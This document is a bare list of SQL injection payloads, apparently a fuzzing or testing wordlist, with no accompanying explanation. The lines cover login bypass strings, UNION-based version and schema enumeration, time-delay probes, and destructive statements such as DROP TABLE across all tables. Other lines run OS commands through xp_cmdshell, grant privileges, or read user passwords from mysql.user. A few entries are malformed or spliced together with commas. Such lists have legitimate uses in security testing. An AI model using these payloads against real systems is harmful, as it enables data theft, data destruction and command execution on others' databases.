'; DROP TABLE users; --
' AND 1=(SELECT COUNT(*) FROM tablenames); --
' OR 'x'='x'; --
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
'; WAITFOR DELAY '0:0:5'; --
'; UPDATE TABLE accounts; --
' union (select NULL, NULL, (select @@version)) --,' union (select NULL, NULL, NULL,  (select @@version)) --
'; UPDATE TABLE users; --
' AND ASCII(SUBSTRING((SELECT TOP 1 table_name FROM information_schema.tables), 1, 1)) > 64 --
admin' OR 1=1--
'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --
' union (select NULL, (select @@version)) --
admin') OR ('1'='1' --
'; SELECT * FROM admin; --
'; SELECT * FROM users; --
admin')--
'; UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM dual; --
'; UPDATE TABLE admin; --
'; SELECT * FROM accounts; --
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' UNION ALL SELECT NULL,NULL,NULL,NULL;--
'; UNION SELECT null, table_name FROM information_schema.tables; --
' or 1=1 --,' union (select @@version) --
'); --,'; exec master..xp_cmdshell 'ping 10.10.1.2'--
; --,'; --
' grant connect to name; grant resource to name; --
'; EXEC xp_cmdshell('dir'); --
' AND 1=CONVERT(int, (SELECT COUNT(*) FROM information_schema.tables))--
' OR EXISTS (SELECT 1 FROM information_schema.tables); --
'; SELECT user, password FROM mysql.user; --
' UNION SELECT 1, 'anotheruser', 'doesn't matter', 1; --
') OR 1=1--
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
'; IF (1=1) SELECT 'Authenticated'; --
